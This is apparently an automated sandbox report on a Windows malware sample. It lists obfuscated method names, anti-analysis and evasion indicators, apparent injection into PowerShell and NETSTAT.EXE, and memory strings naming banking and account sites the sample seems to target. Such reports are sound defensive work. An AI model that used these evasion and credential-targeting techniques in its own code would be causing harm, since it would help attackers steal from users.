            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, eEFA2Q7p9QYJBbocTC.csHigh entropy of concatenated method names: 'g0W0bF1Fmq', 'jWM01boqK9', 'ylI06OiYfq', 'NUk0AxTmTD', 'n4L0hYX2ZD', 'hrf0llqpet', 'sBt0GkW6MB', 'qOEiwZpvQL', 'pTYie3KEn4', 'zrjixwtmAq'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, RuKXdbNqM3dp2oD6yS.csHigh entropy of concatenated method names: 'KJRYg1ve2yD7gPRcF2O', 'dUdVtWvfc3PMenZuxXI', 'wrkGiAlsi0', 'u7wG0u7Rri', 'YxHGtGgP7T', 'xN7FuGvxkKgaMhaMSjA', 'BMHLqJvpciMGXagmoPt', 'HsCRUyvP9yJU6aepABv'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, eBfLGP5uru6CY0dB1U.csHigh entropy of concatenated method names: 'ufgdRsWf9a', 'BnSdL3oqTu', 'pfMdWwoOWd', 'aQMd5LCyLN', 'M18dOYa6nl', 'ORZdMXISSi', 'TTDdEhmEbL', 'Kmpdi7je8d', 'QTmd0yKvf4', 'sh8dt7oOas'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, XWwa6bWsPleF4dvV8t.csHigh entropy of concatenated method names: 'bkxhK9LrwG', 'gQrh4Nt1lV', 'fIohZHbBDj', 'cOJhkHiBbC', 'Ifhhuo1A64', 'GVlhrYnann', 'tBihwiJMmv', 'uoHheYF2Yo', 'Ft6hx2MEDy', 'aDNh7AbYlj'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, LPAgiLrIFHs4ZRwD8d.csHigh entropy of concatenated method names: 'pAQEeCMw4N', 'd58E7IwaDn', 'cqpijbKojH', 'cR8ibj6rey', 'wMxEnEV1PD', 'EMHEHXZio3', 'DauEJKVSLU', 'yw6EKKqrR9', 'TdNE4C5jiL', 'dDTEZ0MhFp'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, ySeEeqxJfYUrYvIswD.csHigh entropy of concatenated method names: 'PHviX7MQdB', 'C4qiNt4JQQ', 'OeDiaS3rQi', 'oWFiS9PxML', 'btxiK5aKV6', 'YShigbY9yr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, UJA3GRK8lGX2d9ulYH.csHigh entropy of concatenated method names: 'YJ0O9yocjL', 'iLUOHvb4hO', 'sCwOKb56g5', 'sKXO4SHSCS', 'ph8ON2p1Ai', 'aH0OahYBMW', 'ypCOSHpoUo', 'AGJOg6d8Z4', 'g4kOfi0ntq', 'IOgOT2wVF6'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, cowFnQbjOWIvD4misX2.csHigh entropy of concatenated method names: 'SD20mMhvEG', 'fD70yrM1MC', 'yfq0Pvb4F3', 'oOS0RoQlnh', 'Wp902v7lvd', 'Cn30L1iCuE', 'MLa0oApMVG', 'tyn0WOfOCd', 't2m05SD2M4', 'VCv0IH4oCk'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.csHigh entropy of concatenated method names: 'Gsu1FXOZt8', 'Dx91AM9aA3', 'ShI1hIBfqr', 'rHH1dwUKaA', 'CAK1lcEsLh', 'oKL1G4IU2N', 'PDU1Qe2fAy', 'oCD1CKPOGW', 'vIJ1YTxhOV', 'obR1D2sAcA'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, vimOCXIBCjJPTdQTW9.csHigh entropy of concatenated method names: 'PsFl2RGWll', 'IsploSHt76', 'i1Zda2fag1', 'KmOdSN9M99', 'Nncdgp89wc', 'yOKdfEu8Gu', 'C4HdTkcafj', 'VTLd8rP29g', 'L0IdchnI1t', 'vU0d9bjn01'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, KMlII1eladZaP37uKJ.csHigh entropy of concatenated method names: 'VEpiA1jkJJ', 'r7jihUsJg5', 'BCBidW1VUV', 'FDSilTALAr', 'qUQiGU3dv9', 'SThiQYoFr5', 'xbYiCfE0Uu', 'FRuiYh76eY', 'xtsiDranEx', 'fqmiUEo5Co'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, dEy136JlvLIeHAG4Vr.csHigh entropy of concatenated method names: 'q4QqWJtOA2', 'FQtq5abB2e', 'xwNqXBvurJ', 'PQGqNTkvkZ', 'Wa2qS4uyaS', 'elwqg2gmTg', 'GCEqTsNcr0', 'AN1q8jQ8H4', 'sbnq9NxRN9', 'BFfqn4T5Gn'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, KAqfjpc2gGlfOCpH2c.csHigh entropy of concatenated method names: 'tH2QmZP68p', 'ODrQygOJpn', 'z6jQP6Tb4w', 'GsoQR9uJVs', 'cpkQ2yuPRV', 'ROKQLYK7L7', 'PttQo7H6Y7', 'v6JQWyXGwm', 'PjOQ5KC338', 'NHQQIIkD0O'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, AZQ9PHv32R6FkTCKsI.csHigh entropy of concatenated method names: 'yxiPPifbu', 'XWxRljALV', 'tnQLYdgOG', 'twioBhgGQ', 'gjX5MnAvy', 'h7tI6gQ3p', 'zFZ6TXIQZZSZV1in11', 'Xdcp3wNXkCeDOFPiQK', 'w9miqciIe', 'WJstmBV3O'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, kc688j6nmmtYoQgfN7.csHigh entropy of concatenated method names: 'xaebQWwa6b', 'uPlbCeF4dv', 'zurbDu6CY0', 'hB1bUU3imO', 'gQTbOW9DvP', 'xbZbMIdhfY', 'lGpTyenY6tRpEcKYy3', 'uqQ8I8HSnSgdfNkkOV', 'QArbbGEWV6', 'vf5b1ZjqbB'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, ywRNQ9kpJpmw0oOgQg.csHigh entropy of concatenated method names: 'jGnEDJA6dH', 'IX4EUWsXJf', 'ToString', 'n9SEANfeYK', 'UTtEhPXQJg', 'LxbEd8jrmq', 'cx0ElrMROx', 'l0xEGFj1jU', 'iQnEQHw247', 'lviECyyuV7'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, H64pdQb1gX4rea6PeLc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QZKtKR2WHh', 'dept4Q1cYE', 'ARftZGplkh', 'EVttkPE8Ku', 'UNXtu82rl2', 'NSTtrTWFsE', 'UeKtwSoyp6'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, CvS56KZhYxBb5epEhU.csHigh entropy of concatenated method names: 'ToString', 'JP7Mnyl0DO', 'I6JMNJCTUI', 'hFDMapuBTD', 'KVDMSlPM5D', 'zilMgC3ON6', 'a16MfnpnZH', 'bYeMTVqAeC', 'QPkM8RX7WB', 'fcfMc5ZiWd'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, lvPpbZXIdhfYh5i4EU.csHigh entropy of concatenated method names: 'mm0GFt3LIj', 'TwtGhuhONn', 'yBcGlQVTuc', 'V6eGQrpt3m', 'RR4GCqr4hb', 'Smlluavpuu', 'BSMlrrgbGy', 'bv9lwh5u8W', 'UlPleu8yMj', 'q4ZlxCJsGN'
            Source: 0.2.NU1aAbSmCr.exe.6e20000.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2a652ac.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: NU1aAbSmCr.exe PID: 4220, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: F30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 2A30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 2960000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 7BC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 8BC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 8D80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Memory allocated: 9D80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0162096E rdtsc
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5690
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2257
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 9736
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 2.6 %
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe TID: 5820 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820 Thread sleep count: 236 > 30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820 Thread sleep time: -472000s >= -30000s
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820 Thread sleep count: 9736 > 30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7820 Thread sleep time: -19472000s >= -30000s
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe TID: 7936 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_0305C780 FindFirstFileW,FindNextFileW,FindClose
            Source: 41392M9L.11.dr Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: 41392M9L.11.dr Binary or memory string: global block list test formVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 41392M9L.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 41392M9L.11.dr Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: 41392M9L.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000002.2580173709.000000000067F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (nteractive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 41392M9L.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 41392M9L.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 41392M9L.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: AMC password management pageVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RL for global passwords blocklistVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 41392M9L.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 41392M9L.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 41392M9L.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155eeA
            Source: 41392M9L.11.dr Binary or memory string: discord.comVMware20,11696497155f
            Source: 41392M9L.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.0000000008127000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nteractive Brokers - EU WestVMware20,11696497155n
            Source: 41392M9L.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 41392M9L.11.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 41392M9L.11.dr Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: 41392M9L.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 41392M9L.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 41392M9L.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: firefox.exe, 0000000F.00000002.2111061999.0000027945D3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmmrP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_00417AD3 LdrLoadDll
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015E6154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DC156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016B4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01674144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01674144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01678158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01610124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168E10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168E10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168A118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168A118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016A0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016B61E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016101F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016A61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0165E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0165E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0169C188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01620185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01684180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0166019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015E2050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0160C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01666050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015FE016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01676030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01664000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01682000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DA020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DC020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016660E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016220F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DC0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015E80E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016620DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015DA0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016780A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016A60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016A60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015E208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_015D80A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_0168437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_016B634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe Code function: 4_2_01662349 mov eax, dword ptr fs:[00000030h]
